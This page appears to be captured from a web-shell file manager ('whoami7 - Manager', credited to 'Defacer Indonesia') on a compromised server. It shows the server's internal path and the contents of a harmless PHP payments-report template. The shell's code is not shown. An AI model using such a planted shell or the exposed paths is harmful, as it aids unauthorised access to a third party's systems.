whoami7 - Manager
:
/
home
/
kckglobal
/
cloud.kckglobal.net
/
application
/
views
/
admin
/
reports
/
includes
/
Upload File:
files >> //home/kckglobal/cloud.kckglobal.net/application/views/admin/reports/includes/sales_payments.php
<?php defined('BASEPATH') or exit('No direct script access allowed'); ?> <div id="payments-received-report" class="hide"> <table class="table table-payments-received-report"> <thead> <tr> <th><?php echo _l('payments_table_number_heading'); ?></th> <th><?php echo _l('payments_table_date_heading'); ?></th> <th><?php echo _l('payments_table_invoicenumber_heading'); ?></th> <th><?php echo _l('payments_table_client_heading'); ?></th> <th><?php echo _l('payments_table_mode_heading'); ?></th> <th><?php echo _l('payment_transaction_id'); ?></th> <th><?php echo _l('note'); ?></th> <th><?php echo _l('payments_table_amount_heading'); ?></th> </tr> </thead> <tbody></tbody> <tfoot> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td class="total"></td> </tfoot> </table> </div>
Copyright ©2021 || Defacer Indonesia